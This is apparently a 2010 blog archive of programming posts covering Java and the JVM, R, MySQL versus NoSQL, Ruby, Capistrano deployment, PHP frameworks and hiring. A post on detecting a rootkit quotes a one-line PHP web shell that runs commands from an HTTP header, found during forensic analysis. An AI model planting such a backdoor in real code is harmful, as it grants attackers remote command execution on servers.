Archive for the ‘programming’ Category

Why choose Java?

Sunday, April 18th, 2010

Over on LinkedIn, Niki Atherton asked “Why choose Java?”. I replied:

I hate Java, but I love the JVM. I toyed around with Java in the early 00s, but I always found it too verbose for my needs. I preferred script languages that allowed me to develop software quickly. I ended up spending a lot of time writing PHP code. I was pleased to read about the death of Java when Bruce Eckel noted the shifting tides of 2005:

The Java hyper-enthusiasts have left the building, leaving a significant contingent of Java programmers behind, blinking in the bright lights without the constant drumbeat of boosterism. But the majority of programmers, who have been relatively quiet all this time, always knew that Java is a combination of strengths and weaknesses. These folks are not left with any feelings of surprise, but instead they welcome the silence, because it’s easier to think and work.

Then Eckel went on to become a major booster of Ruby.

What I did not realize at the time was that the mid-decade marked a turning point for the JVM. Since then there has been a fantastic proliferation of languages that take advantage of the eco-system: Scala, Groovy, BeanShell, hecl, JavaFX, Jython, JRuby, etc.

I rediscovered the world of the JVM in 2008 and I am far more interested in the JVM eco-system than I have ever been before. I had, previously, admired the power and range of Java, but I’d rejected it as too formal, too verbose and too constraining to be of interest. It was a boring, corporate language, with a lot of constraints that made sense for large enterprises but made no sense in the fast-moving startups that I worked with. I wanted the productivity offered by the script languages.

I am now finding that the JVM, in 2010, offers the best of all worlds: dynamic languages that offer a high degree of productivity to programmers, mixed with the vast libraries that allow Java to do anything. And the Java eco-system includes fantastic IDEs like NetBeans and Eclipse. And, of course, it allows for working with a wider range of platforms than what Microsoft’s development tools allow.

When to use the R language

Saturday, April 17th, 2010

When to use the R language

When you have to explore data. At the start of an analytic project, it’s a good idea to create a bunch of graphical visualizations of your data to get a sense of what’s inside it. In terms of its graphical capabilities, R exists in a whole separate dimension from Excel. This was perhaps the most shocking part to me about using R for the first time: I really thought I had a handle on data analysis even though I’d restricted my software to Excel, but boy was I wrong. The visualizations you can create in R are much more sophisticated and much more nuanced. And, philosophically, you can tell that the visualization tools in R were created by people more interested in good thinking about data than about beautiful presentation. (The result, ironically, is a much more beautiful presentation, IMHO.)

Here’s how I’d put the difference to someone who’s familiar with Excel but not yet with R. The graphics creation options that Excel gives you are all based in the graphical user interface. This is what makes Excel relatively easy to use—all your options are laid out before you with nice buttons and fill-in-the-blank boxes. But in order to create a graphical interface that’s easy to use, the creators of Excel had to make a bunch of decisions about what sorts of graphics you are and are not likely to want. With too many choices, the graphical interface becomes cumbersome and frustrating, so to achieve simplicity they had to eliminate options.

And this isn’t a gripe or anything. I can’t say I’d have done a better job designing Excel’s charting graphical interface. I cut my teeth on it.

These limitations become a problem when you want to inspect data visually in a bunch of different ways in order to explore it. R, through a combination of its well-designed base graphics package, the exceptionally well-designed lattice graphics package, and the jaw-droppingly well-designed ggplot2 graphics package, offers a breathtaking array of visualization options that you access through the command line or scripts. It has power that you just can’t get using a graphical interface to generate your charts.

StackOverflow is a hit, so why didn’t StackExchange also become a hit?

Saturday, April 17th, 2010

StackOverflow is a hit, so why didn’t StackExchange also become a hit?

If you had to name a single language to know inside and out, what would it be?

Sunday, April 11th, 2010

Joe Castelli on LinkedIn asked “If you had to name a single language to know inside and out, what would it be?”

My response:

If you’d like to work with robotics, learn C. Possibly also Java/Arduino.

If you’d like to work for a big Hollywood studio, doing Maya 3d graphics, learn MEL.

If you’d like to do web development, then Ruby/Rails or PHP/Symfony or Groovy/Grails are all good bets.

If you’d like to work inside a big corporation and work on their internal dashboards, you’ll need to know either Java or C#.

If you’d like to work at an all Mac publishing house, learn AppleScript.

If you’d like to do animation, then learn Flash/Flex/ActionScript.

If you’d like like to develop for the Linux kernel, learn C.

If you want to design the logic boards that go inside consumer electronic stereo equipment, learn C++.

If you’d like to develop for the iPhone, then learn Objective-C.

If you think you will spend most of your career doing statistical work, then learn the R language.

You get my point? What you should learn depends on what you’d like to do.

Introducing Codewi.se: programming questions, and their award money, collected at one location

Wednesday, April 7th, 2010

Darren Hoyt and I launched WP Questions back in December. So far, $2,260 has been paid out to experts who answered people’s urgent WordPress questions. We have since launched a few other sites, focused on PHP and Javascript, and now today we launch an umbrella site: Codewi.se. One glance at Codewi.se and you will see every question currently looking for an answer, on any of our sites. You will also see how much of an award is being offered for each of the questions.

The teachings of the great master programmer Qc Na

Monday, April 5th, 2010

The teachings of the great master programmer Qc Na.

The venerable master Qc Na was walking with his student, Anton. Hoping to prompt the master into a discussion, Anton said “Master, I have heard that objects are a very good thing – is this true?” Qc Na looked pityingly at his student and replied, “Foolish pupil – objects are merely a poor man’s closures.”

Chastised, Anton took his leave from his master and returned to his cell, intent on studying closures. He carefully read the entire “Lambda: The Ultimate…” series of papers and its cousins, and implemented a small Scheme interpreter with a closure-based object system. He learned much, and looked forward to informing his master of his progress.

On his next walk with Qc Na, Anton attempted to impress his master by saying “Master, I have diligently studied the matter, and now understand that objects are truly a poor man’s closures.” Qc Na responded by hitting Anton with his stick, saying “When will you learn? Closures are a poor man’s object.” At that moment, Anton became enlightened.

Is MySql a really terrible database system?

Thursday, March 25th, 2010

I was surprised by this headline:

DIGG: 4000% PERFORMANCE INCREASE BY SORTING IN PHP RATHER THAN MYSQL

I thought, “How can that be?” Sorting in a database should always be faster than sorting in PHP. Still the article made a lot of good sounding points:

1.) Precompute on writes, make reads fast. This is an oldie as a scaling strategy, but it’s valuable to see how SimpleGeo is applying it to their problem of finding entities within a certain geographical region. Using Cassandra they’ve built two clusters: one for indexes and one for records. The records cluster, as you might imagine, is a simple data lookup. The index cluster has a carefully constructed key for every lookup scenario. The indexes are computed on the write, so reads are very fast. As reads dominate, this makes a lot of sense. Queries based on time are also precomputed. Joe mentions some special algorithms for spreading out data, which tends to cluster around geographical regions, but does not mention what these are.

3.) The relation tool chain has failed for real-time. The relational database tool chain is not evolving. It has failed for large scale, real-time environments. Building scalable systems on a relational database requires building sharding, load balancing, resharding, cluster management, worrying about consistency, implementing distributed queries, and other layers yourself, so why bother? Cassandra does all that for you out of the box. Shot off a server and Cassandra will handle all the remapping and rerouting automatically.

4.) Scaling practices turn a relational database into a non-relational database. To scale at Digg they followed a set of practices very similar to those used at eBay. No joins, no foreign key constraints (to scale writes), primary key look-ups only, limited range queries, and joins were done in memory. When implementing the comment feature a 4,000 percent increase in performance was created by sorting in PHP instead of MySQL. All this effort required to make a relational database scale basically meant you were using a non-relational database anyway. So why not just use a non-relational database from the start?

6.) Scaling equals specialization. To scale often requires building highly custom, problem specific solutions.

But then Denis Forbes offered this counter-point:

Shocked by the incredibly poor database performance described on the Digg technology blog, baffled that they cast it as demonstrative of performance issues with RDBMS’ in general, I was motivated to create a simile of their database problem.

While they posted that entry six months ago, they recently followed up with more statements on the NoSQL / RDBMS divide, and are now being heavily used as a citation of sorts.

For instance Dare Obasanjo held Digg’s moves as a rebuttal of my prior entry on SQL scaling (though my entry actually explicitly excluded incredibly rare edge cases like Digg’s, and my core point was that the majority of database uses don’t have the needs of a site like Digg, I’m always one to take on a challenge), which then got picked up in other blogs.

I would say Digg’s case is an example of a bottom-feeder RDBMS product (apologies for being incendiary, but why does the problem always come down to MySQL? These examples always end up being “we moved from MySQL to NoSQL” rather than “We moved from Sybase ASE to NoSQL”), used arguably suboptimally on unpowered hardware, and it proves nothing of substance about either database technology. Yet it’s held as demonstrative of something, which is why I focus on it. They are different tools in the toolbox, arguably for different purposes, and that isn’t the focus of this entry.

He offers some interesting test results. He also suggests that more companies should take advantage of big servers and cheap RAM:

Database servers really like having a lot of RAM. Ideally you should have more RAM than you have data, allowing it to cache the entirety of your DB (or at least the working-set quantity of DB on that partition) making incredible read performance achievable.

Joining rows is not a hard activity for database servers. It can do it at unfathomable rates if the data can be fed to it at the appropriate pace and in the right form. Even heavily normalized databases can be high performance.

What normally makes joins a performance issue is data locality: if you have to load two rows from different places on the disk, that’s two seeks instead of just one (or three, four, five or more instead of one). When seeks are as costly as they are on a magnetic disk, you avoid it (either by striving for a database that fits in memory, which paradoxical often calls for heavy normalization, or by de-normalizing).

…If I had 48GB of RAM in the test machine (which is fairly pedestrian outside of gerbil-sized cloud instances. Note that you can now add 128GB of RAM to servers for around $4000 in some cases), outside of the initial caching period the select rates would be stratospheric regardless of storage medium, though SSDs would still come in a very, very strong lead when it came to write performance.

For the same $4000 you could chain five Intel X25-E drives for 320GB of intensely high performance – and persistent – storage. Just keep going up until you have more throughput, I/O and storage than you could dream of.

Some high-end enterprise solutions now tier storage and automatically place data as appropriate, choosing between magnetic, SSD, and memory caching systems. The pages of the table that are never touched end up on the magnetic storage while the hot area – say Diggs within the last 6 months – are moved to SSDs or to huge banks of memory caching.

Learning a language means learning the culture

Thursday, March 25th, 2010

This is a great overview of the whole eco-system surrounding Ruby. I like the point he makes that learning a language involves learning the whole culture around the language:

But of course the actual language is only the tip of the iceberg (and finally we come to the actual point of this blog post): where you really face a steep learning curve is, well, everywhere else. Learning a language is a great start, but to be productive in any meaningful sense you also have to learn the libraries, the testing frameworks, the packaging systems, the build tools, the inline documentation systems, the code-hosting services, the documentation-hosting services, and no doubt a bunch of other stuff that I’ve not got around to yet. Let’s look at those in turn, and see how they are panning out for Ruby.

His conclusions, having surveyed some of the diversity of practices within the Ruby community:

None of this the fault of Ruby; all the same issues exist for other languages. I’m gradually coming to the conclusion that they are sort of irreducible: they come with the territory. For Real Work (as opposed to solving interesting puzzles with Prolog or APL), you need a language that has developed a rich culture over time. That’s what enables the language to make all the connections it needs to make in order to do the kinds of things we need to do these days. What it needs, in short, is an ecosystem. And ecosystems are complicated things. They are hard to learn.

Could the Ruby culture be simplified? Well, maybe by fiat. Maybe Matz could decree that all projects must be generated by jeweler, hosted on github, documented in YARD, and must have unit-test using Shoulda. It would, in a way, be nice to have those decisions made for me. But even if the community accepted these diktats, which they wouldn’t, it’s not really what we want. Languages that grow and develop and succeed are those with rich, competitive ecosystems; constrain it too much and it becomes sterile. I’m guessing that in three years, some of the issues I’ve had to make decisions about will be much easier: Darwin will take care of the weaker approaches, and the stronger will survive. That’s how we got the point of Ruby being as good as it is, after all — and by “good” I don’t just mean “elegant” or “fun to use”, but “capable of doing large-scale stuff using many different libraries available from and documented on well-known community sites”.

A comparison of Java and Ruby

Wednesday, March 24th, 2010

Interesting comparison of Java and Ruby:

But now I’ve conveniently landed on an actual conclusion. And here it is. Remember in that Elements of Programming Style review, I drew special attention to the first rule in the first proper chapter — “Say what you mean, simply and directly”? The more that runs through my mind, the more convinced I am that this deceptively simple-sounding aphorism is the heart of good programming. Seven short words; a whole world of wisdom.

And how can I say what I mean simply and directly if I’m spending all my time allocating temporary arrays and typing public static void main? My code can’t be simple if the functions I’m calling have complex interfaces. My code can’t be direct if it has to faff around making places to put intermediate results. If I am going to abide by the Prime Directive, I need a language that does all the fiddly stuff for me.

You do not need to know math to be a programmer, but it opens some doors

Wednesday, March 24th, 2010

I’ve been going through something similar. I’ve done programming for years and I’ve never needed math skills. But recently, I’ve been thinking of all kinds of data mining projects that I’d like to do, so I’ve been reteaching myself algebra, and next year I hope to learn statistics. So I resonate with this:

A little while ago I started thinking about math. You see, I’ve been writing software for quite a few years now and to be totally honest, I haven’t yet found a need for math in my work. There has been plenty of new stuff I’ve had to learn/master, languages, frameworks, tools, processes, communication skills and library upon library of stuff to do just about anything you can think of; math hasn’t been useful for any of it. Of course this is not surprising, the vast majority of the work I’ve been doing has been CRUD in one form or another, that’s the vast majority of the work most developers do in these interweb times of ours. You do consulting – you mostly build websites, you work for a large corporates – mostly build websites, you freelance – you mostly build websites. I am well aware that I am generalising quite a bit, but do bear with me, I am going somewhere.

Eventually you get a little tired of it, as I did. Don’t get me wrong it can be fun and challenging work, providing opportunities to solve problems and interact with interesting people – I am happy to do it during work hours. But the thought of building yet more websites in my personal time has somewhat lost its luster – you begin to look for something more interesting/cool/fun, as – once again – I did. Some people gravitate to front-end technologies and graphical things – visual feedback is seductive – I was not one of them (I love a nice front-end as much as the next guy, but it doesn’t really excite me), which is why, when I was confronted with some search-related problems I decided to dig a little further. And this brings me back to the start of this story because as soon as I grabbed the first metaphorical shovel-full of search, I ran smack-bang into some math and realized exactly just how far my skills have deteriorated. Unlike riding a bike – you certainly do forget (although I haven’t ridden a bike in years so maybe you forget that too :)).

Broadening Horizons

Learning a little bit about search exposed me to all sorts of interesting software-y and computer science-y related things/problems (machine learning, natural language processing, algorithm analysis etc.) and now everywhere I turn I see math and so feel my lack of skills all the more keenly. I’ve come to the realization that you need a decent level of math skill if you want to do cool and interesting things with computers. Here are some more in addition to the ones I already mentioned – cryptography, games AI, compression, genetic algorithms, 3d graphics etc. You need math to understand the theory behind these fields which you can then apply if you want to write those libraries and tools that I was talking about – rather than just use them (be a producer rather than just a consumer – to borrow an OS metaphor :)). And even if you don’t want to write any libraries, it makes for a much more satisfying time building software, when you really understand what makes things tick, rather than just plugging them in and hoping they do whatever the hell they’re supposed to.

What does programming work entail?

Wednesday, March 24th, 2010

Interesting criticism of the type of work that is nowadays common for computer programmers. Good quote from Don Knuth:

“There’s the change that I’m really worried about: that the way a lot of programming goes today isn’t any fun because it’s just plugging in magic incantations — combine somebody else’s software and start it up. It doesn’t have much creativity. I’m worried that it’s becoming too boring because you don’t have a chance to do anything much new. Your kick comes out of seeing fun results coming out of the machine, but not the kind of kick that I always got by creating something new. The kick now is after you’ve done your boring work then all of a sudden you get a great image. But the work didn’t used to be boring.” (page 594)

“The problem is that coding isn’t fun if all you can do is call things out of a library, if you can’t write the library yourself. If the job of coding is just to be finding the right combination of parameters, that does fairly obvious things, then who’d want to go into that as a career?” (page 581)

If() statements in DNA

Saturday, March 20th, 2010

I find it interesting that they might be close to figuring how if() statements are written in DNA:

“We developed a new approach which enabled us to identify cases where a protein’s ability to turn a gene on or off can be affected by interactions with another protein anchored to a nearby area of the genome,” Korbel explains. “With it, we can begin to understand where such interactions happen, without having to study every single regulatory protein out there.”

DNA, combined with the proteins that make up our chromosomes, resembles a solid state computer, in that the software and the working memory share the same medium. The genes make up the “software” that begins the process of creating us, but the rest of our DNA is given over to recording the working state of who we are:

A group of scientists led by Jan Korbel at EMBL and Michael Snyder initially at Yale and now in Stanford were the first to compare individually sequenced human genomes to look for what caused differences in gene regulation amongst ten different people. They focused on non-coding regions – stretches of DNA that lie between genes and, unlike genes, don’t hold the instructions for producing proteins. These DNA sequences, which may vary from person to person, can act as anchors to which regulatory proteins, known as transcription factors, attach themselves to switch genes on or off.

Korbel, Snyder, and colleagues found that up to a quarter of all human genes are regulated differently in different people, more than there are genetic variations in genes themselves. The scientists found that many of these differences in how regulatory proteins act are due to changes in the DNA sequences they bind to. In some cases, such changes can be a difference in a single letter of the genetic code, while in others a large section of DNA may be altered. But surprisingly, they discovered even more variations could not be so easily explained. They reasoned that some of these seemingly inexplicable differences might arise if regulatory proteins didn’t act alone, but interacted with each other.

Here is an oddly conservative statement:

Finally, Korbel, Snyder and colleagues compared the information on humans with that from a chimpanzee, and found that with respect to gene regulation there seems to be almost as much variation between humans as between us and our primate cousins – a small margin in which may lie important clues both to how we evolved and to what makes us humans different from one another.

In a study published online in Nature yesterday, researchers led by Snyder in the USA and Lars Steinmetz at EMBL in Heidelberg have found that similar differences in gene regulation also occur in an organism which is much farther from us in the evolutionary tree: baker’s yeast.

Do they simply not understand what they are looking at? Are they unaware that software has both code and state? As a point of comparison, If a friend of mine is playing a game of Halo, and Microsoft suddenly gave me the complete source code to Halo, would I know what was happening to my friend in the game? Of course not – how many times he’s been killed, how much ammo he has left, that would all be state, that would all be recored in working memory, it wouldn’t be in the source code. Or, another example, if I’m given the complete source code for Adobe Photoshop, I still know nothing about what images people, all across the world, might be editing at any given moment. Having source code doesn’t tell me state.

Why is this obvious to me and yet seemingly confusing to the biologists?

Is Apostrophe the best CMS written in PHP?

Thursday, March 18th, 2010

Robert Speer has a great write up of Apostrophe:

Apostrophe is the easiest to use content management system (CMS) available to the open source community. An easy CMS means that content managers are more likely to use it, which means consumers will get better information and be more likely to follow the sites profit funnel.

For web solutions providers Apostrophe is a CMS solution that bypasses the commodity hell of Wordpress, Drupal, and Joomla by providing a unique value differentiation. Apostrophe also has the advantage of being built on an enterprise grade web framework used by sites like Delicious, Dailymotion, Yahoo! Answers, and Yahoo! Bookmarks. Symfony provides a consistent structure that encourages collaboration, and the large community of developers already familiar with Symfony mean help is available.

Mercurial is better than Subversion?

Thursday, March 18th, 2010

Joel Spolsky convinces me that Mercurial is better than Subversion.

In that podcast, I said, “To me, the fact that they make branching and merging easier just means that your coworkers are more likely to branch and merge, and you’re more likely to be confused.”

Well, you know, that podcast is not prepared carefully in advance; it’s just a couple of people shooting the breeze. So what usually happens is that we says things that are, to use the technical term, wrong. Usually they are wrong either in details or in spirit, or in details and in spirit, but this time, I was just plain wrong. Like strawberry pizza. Or jalapeño bagels. WRONG.

Long before this podcast occurred, my team had switched to Mercurial, and the switch really confused me, so I hired someone to check in code for me (just kidding). I did struggle along for a while by memorizing a few key commands, imagining that they were working just like Subversion, but when something didn’t go the way it would have with Subversion, I got confused, and would pretty much just have to run down the hall to get Benjamin or Jacob to help.

I do not enjoy doing merges of any kind in Subversion. Normally, when I get some code stable enough for release, I then abandon that line. I’ll do emergency bug fixes, but no further work. Instead, I start a new Subversion project, and all future work happens in that new project. Clearly, this is not the way version control is suppose to work. So I’m intrigued that Mercurial might fix the problems with Subversion.

A JavaFX group at Mix Oracle

Sunday, March 14th, 2010

There is a new JavaFX group at Mix Oracle. Oddly, it has no RSS feed, so I have to post a link here, or I will not remember that it exists.

Deployment strategies with Capistrano

Saturday, March 13th, 2010

2 posts on deploying web software with Capistrano.

Craig T Mackenzie writes:

Like most people I use capistrano to deploy my rails applications, at work we host with the excellent railsmachine and they have really helped simplify the process of deploying to their servers using the railsmachine gem, which builds on top of the excellent functionality of capistrano.

The way these tools work by default they only allow you to deploy one instance of your application, which is fine, that’s all they’re are intended to do. But in the client facing world you’re probably going to want to have at least two versions of the same application at different stages of development running on the same server.

A live forward facing version (my-app.com) and a staging version (staging.my-app.com) for client approval / production testing (not code testing, that should stay on your development box) / progressive reviews etc.

So how do we achieve that? The idea is to determine what context you are deploying your application in, and use the fact the capistrano tasks can be chained together to set everything up ready for deploying a revision of your application to a targeted url, independent of other deployments.

Jamis Buck writes:

I’m still really pushing back against adding staging support into
Capistrano itself. You can accomplish what you want without using
environment environment variables by using cap’s -S switch:

cap -S stage=production deploy

Then, your deploy.rb looks like:

# set the default, unless it was set on the CLI
set :stage, “development” unless variables[:stage]

# do the setup, based on the selected stage
case stage
when “production”
set :deploy_to, “…”
role :web, “…”
role :app, “…”

when “development”

when “demo”

else
raise “unsupported staging environment: #{stage}”
end

How to discover a rootkit attack on your Linux server

Saturday, March 13th, 2010

A great bit of sysadmin detective work.

The second entry, with the POST looks pretty strange. I opened the admin/record_company.php file and discovered that it is part of zen-cart. The first result of googling for “zencart record_company” is this:Zen Cart ‘record_company.php’ Remote Code Execution Vulnerability. So that’s exactly how they were able to run code as the apache2 user.

Opening images/imagedisplay.php shows the following code:
<?php system($_SERVER["HTTP_SHELL"]); ?>
This code allows running commands using the account of the user running the apache2 server.

Eli White on using lambda functions in PHP

Friday, March 12th, 2010

Eli White offers a very smart use of lambda functions in PHP.

Now not only would this work for my specific situation, but ANY controller could reuse this pagination subview and define exactly how it wanted it’s URLs to be formed. Now, the view could completely change around how the pagination section is displayed, show as many, or as few pages as it wants to, and all that without ever touching the controller.

This is one simple example, but I’ve become enamored of this approach. Using lambda functions in this way, you are able to have complicated logic represented inside of your view, but encapsulated/created by the controller. Also of note is the fact that the view is managing to use the $jsfunc and $baseurl values, but without actually having to be granted access to them. This allows for another level of encapsulation, as I exposed one function, instead of 2 separate variables. In the future if other data points start being needed to determine what a URL should be, the view never needs know that, as the controller will continue to update the function on it’s behalf.

Why software frameworks are beneficial to clients

Friday, March 12th, 2010

On LinkedIn, I had a useful conversation with Kris Herlaar, which I will repeat here.

Personal, individual frameworks made a lot of sense in 2000 and 2001 and 2002, but now? Of my 3 most recent contracts, 2 were rebuilds of sites built by some other PHP programmer. In some cases the code was good, but the framework was their own, all together personal, and undocumented.

I think we betray our clients if we use personal frameworks in 2010. You can build a great site using Cake, Symfony, CodeIgniter, or WordPress, Joomla, or Drupal. You can build a great site using modified versions of existing CMSs, or using an open source framework to build your software. These open source projects offer standardization, and standardization is important. These open source projects offer documentation, and documentation is important.

Kris wrote:

People with different backgrounds have different ideas about what is good, and there are probably frameworks for every possible set of ideas you and I could think of.

Yes, and this fact is expensive for my clients.

I do think what I’m writing about here is, in fact, a trend. When I look for new PHP gigs, I notice more and more of them require the use of some framework or CMS. The most common requests are Drupal, WordPress, Joomla, Symfony and CodeIgniter. My sense is that businesses are realizing that it is expensive to allow a programmer to invent their own framework, so the businesses are insisting on the use of some open source software which is well documented.

Here is the scenario that I have seen a lot during the last 5 years:

A company hires a PHP programmer. The company (called “abc”) says “Build us a website that does xyz.” The programmer invents their own software and builds xyz. Since the programmer thinks they are working alone, they allow themselves to cut corners.They copy and paste code. They do not refactor as much as they should. They do not document much, since they assume they are the only ones working with the code.

After 3 years, the programmer leaves to take a new job somewhere else. The “abc” company now hires a new PHP programmer. The company says “Please fix all the bugs in xyz”. The new programmer struggles to learn the code written by the last programmer. There is no documentation regarding how the software works. The last programmer, now gone, rarely responds to questions via email.The new programmer eventually figures out that the old code had some architecture, but the exceptions to the architecture continue to baffle. And why does the code repeat in some places? Is that a bit of copy and paste, or was that really necessary somehow?

After the bugs are fixed, the company says “Great, now, lets extend xyz and add in features lmnop.” Extending the old code is difficult for the new programmer, since they have no idea how the last programmer intended for the code to be extended. More so, the last programmer didn’t even foresee some of the new needs of lmnop so the old code is badly suited to the new job. The new programmer struggles with the task of adding features while keeping the code base backwards compatible. A job that should take 1 month instead takes 2 months.

Finally, with that done, the company says to the programmer, “Great, now we are going to start a totally new project, the def project. You can use any technology you want for this. You can invent your own framework for this, if you want.” The new programmer rejoices! Finally, they will be allowed to do things their way! They will get to write code that makes sense to them! They will get to build an architecture that makes sense to them! The programmer invents their own software and builds def. Since the programmer thinks they are working alone, they allow themselves to cut corners.They copy and paste code. They do not refactor as much as they should. They do not document much, since they assume they are the only ones working with the code.

After 3 years, the programmer leaves to take a new job somewhere else. The “abc” company now hires a new PHP programmer. The new programmer must now work with the patched, extended, bloated project of xyz. They must also work with def, which they find confusing. Each project was written by a different programmer, uses a different architecture, makes different assumptions about what is good code.

You see the problem? This is not sustainable.

Consider Kris’s words:

“People with different backgrounds have different ideas about what is good, and there are probably frameworks for every possible set of ideas you and I could think of.”

That is the problem that can be fixed by committing to a framework.

Just to be clear, I think the choice of a framework might be arbitrary, and yet will still be useful. That is, the framework does not have to be the “best”. It merely needs to offer consistency. There is a great benefit to consistency, especially over the long term. I mean, it is good if you can get several programmers who will work with some basic set of core assumptions – a decent framework will offer that.

Another problem that I have seen a lot of is the programmer who thinks they are working alone. Either they are the only programmer at the business, or they are assigned some project that belongs to them and which no other programmer is allowed to touch. So they think they are alone. But after a few years, they leave the company, and some other programmer is brought in to handle their work.

Over time, all projects involve multiple programmers. Programmers seem to be slow to recognize this. After some years, they will move on, and some other programmer will have to work on their code. I wish more programmers could be made to see this.

I am especially aware of this right now, because, as I said, 2 of my last 3 gigs I have been brought in to save/rebuild code left by some other programmer.

Gay marriage: how to design the database

Thursday, March 11th, 2010

Gay marriage: the database engineering perspective. This is great stuff. The essay is ostensibly about how to handle the recording of gay marriage in a database. But it uses the issue of gay marriage to go through every classic issue of database design, from foreign keys to normalization to the degree of abstraction needed to handle polyamorous marriages. From now on, when I’ve got a friend trying to learn how to design databases, I will send them to this essay.

There are various objections to expanding the conventional, up-tight, as-God-intended “one man, one woman” notion of marriage but by far the least plainly bigoted ones I am aware of are the bureaucratic ones.

To be blunt, the systems aren’t set up to handle it. The paper forms have a space for the husband’s name and a space for the wife’s name. Married people carefully enter their details in block capitals and post the forms off to depressed paper-pushers who then type that information into software front-ends whose forms are laid out and named in precisely the same fashion. And then they hit “submit” and the information is filed away electronically in databases which simply keel over or belch integrity errors when presented with something so profound as a man and another man who love each other enough to want to file joint tax returns.

Speaking as a computery-type person, altering the paper forms is not my department. It’s probably expensive and there are probably millions of existing incorrect forms which would need returning or recycling or burning instead of using. Or maybe it’s simple. I don’t know. The real question from my perspective is how you store a marriage in a computer.

Altering your database schema to accommodate gay marriage can be easy or difficult depending on how smart you were when you originally set up your system to accommodate heterosexuality only. Let’s begin.

Who can learn to program?

Tuesday, March 9th, 2010

I am intrigued by the idea that some people are simply unable to learn to program:

It has taken us some time to dare to believe in our own results. It now seems to us, although we are aware that at this point we do not have sufficient data, and so it must remain a speculation, that what distinguishes the three groups in the first test is their different attitudes to meaninglessness.

Formal logical proofs, and therefore programs – formal logical proofs that particular computations are possible, expressed in a formal system called a programming language – are utterly meaningless. To write a computer program you have to come to terms with this, to accept that whatever you might want the program to mean, the machine will blindly follow its meaningless rules and come to some meaningless conclusion. In the test the consistent group showed a pre-acceptance of this fact: they are capable of seeing mathematical calculation problems in terms of rules, and can follow those rules wheresoever they may lead. The inconsistent group, on the other hand, looks for meaning where it is not. The blank group knows that it is looking at meaninglessness, and refuses to deal with it.

SQL Injection attacks are more common than developers realize

Saturday, March 6th, 2010

RafalLos writes:

Now – without doing any actual hacking, I immediately noticed that something was wrong. While it’s hard to read the SQL error – it reads “ADODB.Field error ‘80020009′ Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /menu.asp line 0″ Without even pulling out the Google search I already knew what that meant – I wasn’t the first one there with malicious intent.

Immediately the folks at the back of the room took notice of the error, and started asking each other if anyone had heard that the site was having issues, or was down…

I decided to quit, in case this site was down intentionally, or something was actually broken… but the gentlemen in the front row pressed me to continue, to “see if there was actually a vulnerability”. Quickly I took a simple glance at the URL line, and appended the tell-tale test for SQL Injection, the single tick ‘ .

The Ruby languages takes off, and CNET misses the story

Monday, February 22nd, 2010

CNET has an odd story called “PHP and Perl crashing the enterprise party“. They then show a graph that shows usage of Perl is dead flat or even declining. The graph also shows Python being the script language with the fastest increase in usage. So if the title was based on the graph, then it should have read “PHP and Python crashing the enterprise party”. But even that would have been a lie, because they left out Ruby. When you look at this graph with Ruby in it, you realize that Ruby blows everything else away. Python and PHP both lag behind Ruby in a big way.

A clever SSH trick

Sunday, February 21st, 2010

An easy way to configure SSH to make login in a breeze.

Eli White responds to Fabien Potencier regarding template engines

Sunday, February 21st, 2010

Over on Symfony Nerds, I wrote about Potencier’s ideas about a template engine. I just noticed that Eli White had also written an intelligent reply, well worth reading.

RESTful architectures and Symfony: how big should modules be?

Saturday, February 20th, 2010

I’ve a new post up at Symfony Nerds. In it, I look at the implications of a RESTful architecture for Symfony. Should every module just have 4 actions, read, write, update and delete?

How to handle floating point math on a computer

Thursday, January 28th, 2010

I stumbled upon this essay, apparently regarded by some as a classic. I have not read it all, though it looks like it answers a lot of my questions about the bizarre handling of floating point numbers that I’ve noticed in some situations. What Every Computer Scientist Should Know About Floating-Point Arithmetic.

How to hire programmers

Friday, January 15th, 2010

Colin Steele writes about hiring programmers and asking them to show a code sample:

Since I’ve long viewed the practice of programming as a craft, I’ve tried to apply the notion of a portfolio, a gimmick I learned from my boss back at AOL. A good programmer should have a body of work, which can be shown, and in it you will find strong clues as to the type of programmer they are. So unless I’ve worked with someone before, directly, along with references and resumes, I ask them to provide:

A significant code sample which you feel is representative of your best recent work.

You might be surprised how that surprises folks. I’m not sure if they think I’m going to poach their code, or rat them out to the employers whom they were working for when they wrote it, or what. In any case, of those that get over it and send me something, a disheartening number send me what amount to toys – 100 line incomplete snippets of something-or-other. Or, just as bad, a swath of user interface callback code, or a class definition that’s 90% setters and getters. Sigh.

Once I’ve settled on the notion that a particular person might be a good hire, I try them out. That amounts to a six-month “no fault divorce” period, where the candidate is brought on board as a 1099 contractor, but in all other ways as a full fledged member of the team. Most folks need six months to settle in, get embedded in team dynamics, and learn enough of the problem domain to be useful. During that time, if anything doesn’t feel right – and I do this purely based on gut instincts – I gently end the relationship.

I can imagine for some kinds of coding this is especially important. If you’re writing an application whose main goal is data mining, then to see a code sample that shows an unusual cleverness in sorting or averaging or summing or grouping or parsing might be very important. However, that would not apply to a lot of the work I have done over the last 10 years. I might make a distinction between the engineers who design cars versus the car mechanics who fix cars. The engineers have to know a lot more than the mechanics. But for about 95% of the web sites I’ve built over the last 10 years, the work has been more like that of a car mechanic, rather than that of a car designer.

Much of the work I’ve done, and for which I’ve hired people, has been straightforward CMS work, which, in a sense, is the simplest kind of programming – designing the database is one of the few high-level, strategic decisions one has to make for that kind of work. The rest is just writing some code to either put data into the database, or take data out of the database. These projects do not necessarily demand great technical cleverness, but they do demand clear thinking. The worst thing about CMS projects is the way the code tends to sprawl over time. After 3 or 4 years working on a CMS, you find you have 50 modules, and you find the amount of redundant code building up in your system is allowing the same bugs to show up, again and again and again. The need to keep things organized eventually becomes the #1 priority. I’d be unable to figure out how well-organized someone is from a short code snippet. For me, the important test is the one Steele mentions at the end – giving someone a test of a few months.

But of course, one needs to screen out the folks who are really bad. Since 2006, I’ve had to hire programmers for 3 different projects. As I wrote in How Much Should You Lie On Your Resume:

The interviews were amazing. People would claim all kinds of things on their resume that they couldn’t defend when we met for an interview.

One woman said she knew Javascript. During the interview, I asked how well she knew Javascript. She said she’d taken a class in it during 1999 (that’s 8 years previous!). Could she write a single line of Javascript now? Um, no. But, uh, if she started working with it, she was sure it would come back quickly.

